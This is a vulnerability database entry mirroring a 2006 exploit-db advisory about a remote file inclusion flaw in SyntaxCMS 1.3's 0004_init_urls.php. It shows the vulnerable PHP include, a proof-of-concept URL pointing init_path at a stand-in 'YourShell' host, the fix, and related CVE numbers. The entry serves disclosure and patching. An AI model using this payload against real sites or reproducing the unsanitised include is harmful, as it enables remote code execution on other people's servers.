Lucene search
MoHaJaLiEDB-ID:2424HistorySep 24, 2006 - 12:00 a.m.
SyntaxCMS 1.3 - '0004_init_urls.php' Remote File Inclusion
2006-09-2400:00:00
MoHaJaLi
www.exploit-db.com
24
AI Score
7.4
Confidence
Low
Remote File Include in syntaxCMS
Vulnerable File:
0004_init_urls.php
Vulnerable Code:
1 <?php
2 include_once( $init_path . '/init.urls.php' );
3 ?>
PoC:
http://www.poweredbysyntaxcmssite.com/admin/testing/tests/0004_init_urls.php?init_path=http://YourShell?&
Solution:
Remove This File...it's not needed...just used for tests
Found by MoHaJaLi
Greetz to Eddy_BAck0o
# milw0rm.com [2006-09-24]Related
cve
cve
CVE-2006-5055
2006-09-28 00:07:00
CVE-2006-5105
2006-10-03 04:03:00
nvd
nvd
CVE-2006-5055
2006-09-28 00:07:00
CVE-2006-5105
2006-10-03 04:03:00
cvelist
cvelist
CVE-2006-5055
2006-09-28 00:00:00
CVE-2006-5105
2006-10-02 20:00:00